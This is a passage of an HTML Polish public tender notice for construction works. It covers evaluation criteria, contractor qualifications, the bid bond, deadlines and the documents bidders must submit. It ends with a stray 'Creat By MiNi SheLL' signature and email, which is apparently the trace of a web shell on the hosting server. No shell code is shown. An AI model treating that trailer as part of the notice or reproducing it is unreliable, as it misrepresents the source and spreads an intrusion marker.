dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny<br/>ofert. Wykonawca może otrzymać max 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale 6 SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>7.2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>7.2.1.	zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa warun¬ku w powyższym zakresie,<br/>7.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie określa warunku w powyższym zakresie;<br/>7.2.3.	sytuacji ekonomicznej lub finansowej - Zamawiający nie określa warunku w powyższym zakresie.<br/>7.2.4.	zdolności technicznej lub zawodowej - W celu potwierdzenia spełniania przez Wyko¬nawcę warunku udziału w postępowaniu Zamawiający wymaga:<br/>7.2.4.1.	Wykonania (zakończenia) nie wcześniej niż 5 lat przed upływem terminu składa¬nia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej o wartości nie mniejszej niż 150 tys. brutto (zrealizowanej w ramach jednego zamówie¬nia) w zakresie tożsamym dla zadań. Na potwierdzenie spełnienia udziału w postępowaniu wystarczy wykazać co najmniej jedną robotę budowlaną – zakończoną i realizowaną w ramach jednego zamówienia.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych (wg zał. nr 5) dotyczy robót budowlanych, w których wykonaniu wykonawca bezpo¬średnio uczestniczył.<br/>7.2.4.2.	Dysponowania osobami, które będą skierowane przez Wykonawcę do realizacji zamówienia, umożliwiającymi realizację zamówienia na odpowiednim poziomie ja¬kości, posiadającymi wymagane uprawnienia budowlane:<br/>7.2.4.2.1. do kierowania robotami budowlanymi:<br/>- kierownikiem budowy - osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, zgodnie z ustawą z dnia 07.07.1994r. Prawo budowlane<br/>- kierownikiem robót sanitarnych - osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, zgodnie z ustawą z dnia 07.07.1994 r. - Prawo budowlane,<br/>- kierownikiem robót elektrycznych - osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z ustawą z dnia 07.07.1994 r. - Prawo budowlane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis<br/>lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w<br/>imieniu odpowiednio Wykonawcy oraz podmiotu udostępniającego zasoby jest umocowana do jego<br/>reprezentowania, chyba, że Wykonawca w formularzu oferty (zał. nr 4 do SWZ) wskaże dane<br/>umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego (poprzez np. podanie nr<br/>KRS, NIP, REGON).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych<br/>(zgodnie z zał. nr 5) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie<br/>dokumenty.<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego (zgodnie z zał. nr 5), w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania<br/>tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.1.	Składający ofertę powinien wnieść wadium przed upływem terminu składania ofert, w wysoko¬ści: <br/>	w wysokości: 7 000,00 zł (słownie: siedem tysięcy złotych i 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający uzna<br/>warunki udziału za spełnione jeżeli:<br/>1/ w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>2/ warunki udziału w postępowaniu muszą zostać spełnione przez wykonawców łącznie.<br/>W przypadku polegania na zasobach innych podmiotów :<br/>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone<br/>przez wykonawców dokumenty i oświadczenia.<br/>Zamawiający odrzuci ofertę, jeżeli zostanie złożona przez wykonawcę niespełniającego warunków<br/>udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.zolkiewka.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-12 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia:<br/>1) Wypełniony i podpisany Formularz ofertowy (wg zał. nr 4) - w przypadku składania oferty<br/>przez<br/>podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich<br/>wykonawców składających ofertę wspólną oraz informację o części za mówienia, której<br/>wykonanie, wykonawca zamierza powierzyć podwykonawcom – w przypadku powierzenia przez<br/>wykonawcę części zamówienia podwykonawcom. Uwaga! W informacji należy podać również<br/>nazwy (firmy) podwykonawców, którym zostaną powierzone do wykonania części zamówienia (o<br/>ile są już znani na etapie składania ofert).<br/>2)Kosztorys ofertowy<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu zgodnie z art. 125 ust. 1 ustawy Pzp aktualne na dzień składania ofert.<br/>4) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, chyba, że<br/>Wykonawca w formularzu oferty (zał. nr 4 do SWZ) wskaże dane umożliwiające dostęp do tych<br/>dokumentów samodzielnie przez Zamawiającego (poprzez np. podanie nr KRS, NIP, REGON).<br/>5) Informacja dot. powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia<br/>11 marca 2004 r. o podatku od towarów i usług w trybie art. 225 ust. 1 ustawy Pzp.<br/>6) W przypadku składania oferty wspólnej (wspólnego ubiegania się o zamówienie publiczne) do<br/>oferty należy dołączyć (dotyczy także wspólników spółki cywilnej):<br/>6.1.) Pełnomocnictwo,<br/>7) Dokumenty potwierdzające, że osoba działająca w imieniu Wykonawcy jest umocowana do<br/>jego reprezentacji:<br/>7.1) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy – jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 3. Postanowienia dotyczące<br/>pełnomocnictwa określone w przepisach Kodeksu Cywilnego stosuje się odpowiednio.<br/>7.2) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania w<br/>postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 58 Pzp (dotyczy<br/>również wspólników spółki cywilnej), jeżeli w ich imieniu działa osoba, której umocowanie do<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 3). Postanowienie dotyczące<br/>pełnomocnictwa określone w przepisach Kodeksu Cywilnego stosuje się odpowiednio.

Creat By MiNi SheLL
Email: jattceo@gmail.com